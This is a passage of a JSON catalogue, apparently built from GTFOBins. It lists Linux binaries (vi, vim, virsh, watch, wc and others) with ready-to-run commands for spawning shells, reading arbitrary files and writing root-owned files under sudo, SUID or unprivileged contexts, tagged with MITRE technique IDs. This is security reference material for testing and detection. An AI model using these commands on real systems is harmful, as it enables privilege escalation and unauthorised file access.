Escalation"],"nativeCategory":["shell"],"command":"vi -c ':!/bin/sh' /dev/null","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:0:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"vi -c ':!/bin/sh' /dev/null","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:1:sudo","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':shell'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:1:suid","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':shell'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:1:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"vi -c ':shell'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:2:sudo","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':set shell=/bin/sh | shell'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:2:suid","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':set shell=/bin/sh\\ -p | shell'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:2:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"vi -c ':set shell=/bin/sh | shell'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:3:sudo","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c :terminal /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:3:suid","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':terminal /bin/sh -p'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:3:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"vi -c :terminal /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vigr:inherit:0:sudo","toolId":"gtfo:vigr","toolName":"vigr","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vigr","description":"Despite requiring superuser privileges to run, the editor is executed as the unprivileged user.","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vigr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vigr:inherit:0:suid","toolId":"gtfo:vigr","toolName":"vigr","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vigr","description":"Despite requiring superuser privileges to run, the editor is executed as the unprivileged user.","mitre":["T1005","T1565","T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vigr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vim:file-read:0:sudo","toolId":"gtfo:vim","toolName":"vim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"vim -c ':redir! >/path/to/output-file | echo \"DATA\" | redir END | q'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:file-read:0:suid","toolId":"gtfo:vim","toolName":"vim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"vim -c ':redir! >/path/to/output-file | echo \"DATA\" | redir END | q'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:file-read:0:unprivileged","toolId":"gtfo:vim","toolName":"vim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"vim -c ':redir! >/path/to/output-file | echo \"DATA\" | redir END | q'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:inherit:0:sudo","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"vim -c ':py ...'","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:inherit:0:suid","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"vim -c ':py ...'","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:inherit:0:unprivileged","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"vim -c ':py ...'","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:inherit:1:sudo","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"vim -c ':lua ...'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:inherit:1:suid","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"vim -c ':lua ...'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:inherit:1:unprivileged","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"vim -c ':lua ...'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:inherit:2:sudo","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vim","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:inherit:2:suid","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vim","mitre":["T1005","T1565","T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:inherit:2:unprivileged","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"vim","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vipw:inherit:0:sudo","toolId":"gtfo:vipw","toolName":"vipw","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vipw","description":"Despite requiring superuser privileges to run, the editor is executed as the unprivileged user.","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vipw/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vipw:inherit:0:suid","toolId":"gtfo:vipw","toolName":"vipw","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vipw","description":"Despite requiring superuser privileges to run, the editor is executed as the unprivileged user.","mitre":["T1005","T1565","T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vipw/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:virsh:command:0:sudo","toolId":"gtfo:virsh","toolName":"virsh","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"cat >/path/to/temp-file.xml <<EOF\n<domain type='kvm'>\n <name>x</name>\n <os>\n <type arch='x86_64'>hvm</type>\n </os>\n <memory unit='KiB'>1</memory>\n <devices>\n <interface type='ethernet'>\n <script path='/path/to/command'/>\n </interface>\n </devices>\n</domain>\nEOF\nvirsh -c qemu:///system create /path/to/temp-file.xml\nvirsh -c qemu:///system destroy x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/virsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:virsh:file-write:0:sudo","toolId":"gtfo:virsh","toolName":"virsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\n\ncat >/path/to/temp-file.xml <<EOF\n<volume type='file'>\n <name>y</name>\n <key>/path/to/output-dir/output-file</key>\n <source>\n </source>\n <capacity unit='bytes'>5</capacity>\n <allocation unit='bytes'>4096</allocation>\n <physical unit='bytes'>5</physical>\n <target>\n <path>/path/to/output-dir/output-file</path>\n <format type='raw'/>\n <permissions>\n <mode>0600</mode>\n <owner>0</owner>\n <group>0</group>\n </permissions>\n </target>\n</volume>\nEOF\n\nvirsh -c qemu:///system pool-create-as x dir --target /path/to/output-dir/\nvirsh -c qemu:///system vol-create --pool x --file /path/to/temp-file.xml\nvirsh -c qemu:///system vol-upload --pool x /path/to/output-dir/output-file /path/to/temp-file\nvirsh -c qemu:///system pool-destroy x","description":"This requires the user to be in the `libvirt` group. If the target directory doesn't exist, `pool-create-as` must be run with the `--build` option. The destination file ownership and permissions can be set in the XML.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/virsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:virsh:file-write:0:unprivileged","toolId":"gtfo:virsh","toolName":"virsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\n\ncat >/path/to/temp-file.xml <<EOF\n<volume type='file'>\n <name>y</name>\n <key>/path/to/output-dir/output-file</key>\n <source>\n </source>\n <capacity unit='bytes'>5</capacity>\n <allocation unit='bytes'>4096</allocation>\n <physical unit='bytes'>5</physical>\n <target>\n <path>/path/to/output-dir/output-file</path>\n <format type='raw'/>\n <permissions>\n <mode>0600</mode>\n <owner>0</owner>\n <group>0</group>\n </permissions>\n </target>\n</volume>\nEOF\n\nvirsh -c qemu:///system pool-create-as x dir --target /path/to/output-dir/\nvirsh -c qemu:///system vol-create --pool x --file /path/to/temp-file.xml\nvirsh -c qemu:///system vol-upload --pool x /path/to/output-dir/output-file /path/to/temp-file\nvirsh -c qemu:///system pool-destroy x","description":"This requires the user to be in the `libvirt` group. If the target directory doesn't exist, `pool-create-as` must be run with the `--build` option. The destination file ownership and permissions can be set in the XML.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/virsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:virsh:file-write:1:sudo","toolId":"gtfo:virsh","toolName":"virsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"virsh -c qemu:///system pool-create-as x dir --target /path/to/dir/\nvirsh -c qemu:///system vol-download --pool x input-file output-file\nvirsh -c qemu:///system pool-destroy x","description":"This requires the user to be in the `libvirt` group.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/virsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:virsh:file-write:1:unprivileged","toolId":"gtfo:virsh","toolName":"virsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"virsh -c qemu:///system pool-create-as x dir --target /path/to/dir/\nvirsh -c qemu:///system vol-download --pool x input-file output-file\nvirsh -c qemu:///system pool-destroy x","description":"This requires the user to be in the `libvirt` group.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/virsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:volatility:inherit:0:sudo","toolId":"gtfo:volatility","toolName":"volatility","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"volatility -f /path/to/core-dump volshell\n...","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/volatility/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:volatility:inherit:0:suid","toolId":"gtfo:volatility","toolName":"volatility","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"volatility -f /path/to/core-dump volshell\n...","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/volatility/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:volatility:inherit:0:unprivileged","toolId":"gtfo:volatility","toolName":"volatility","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"volatility -f /path/to/core-dump volshell\n...","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/volatility/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:w3m:file-read:0:sudo","toolId":"gtfo:w3m","toolName":"w3m","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"w3m -dump /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/w3m/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:w3m:file-read:0:suid","toolId":"gtfo:w3m","toolName":"w3m","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"w3m -dump /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/w3m/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:w3m:file-read:0:unprivileged","toolId":"gtfo:w3m","toolName":"w3m","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"w3m -dump /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/w3m/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wall:file-read:0:sudo","toolId":"gtfo:wall","toolName":"wall","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"wall --nobanner /path/to/input-file","description":"The textual file is dumped on the current TTY (neither to `stdout` nor to `stderr`).","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wall/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:watch:shell:0:sudo","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"watch -x /bin/sh -c 'reset; exec /bin/sh 1>&0 2>&0'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/watch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:watch:shell:0:suid","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"watch -x /bin/sh -p -c 'reset; exec /bin/sh -p 1>&0 2>&0'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/watch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:watch:shell:0:unprivileged","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"watch -x /bin/sh -c 'reset; exec /bin/sh 1>&0 2>&0'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/watch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:watch:shell:1:sudo","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"watch 'reset; exec /bin/sh 1>&0 2>&0'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/watch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:watch:shell:1:suid","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"watch 'reset; exec /bin/sh 1>&0 2>&0'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/watch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:watch:shell:1:unprivileged","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"watch 'reset; exec /bin/sh 1>&0 2>&0'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/watch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wc:file-read:0:sudo","toolId":"gtfo:wc","toolName":"wc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"wc --files0-from /path/to/input-file","description":"The file content is parsed as a sequence of `\\x00` separated paths. On error the file content appears in a message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wc:file-read:0:suid","toolId":"gtfo:wc","toolName":"wc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"wc --files0-from /path/to/input-file","description":"The file content is parsed as a sequence of `\\x00` separated paths. On error the file content appears in a message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wc:file-read:0:unprivileged","toolId":"gtfo:wc","toolName":"wc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"wc --files0-from /path/to/input-file","description":"The file content is parsed as a sequence of `\\x00` separated paths. On error the file content appears in a message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wg-quick:shell:0:sudo","toolId":"gtfo:wg-quick","toolName":"wg-quick","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cat >/path/to/temp-file.conf <<EOF\n[Interface]\nPostUp = 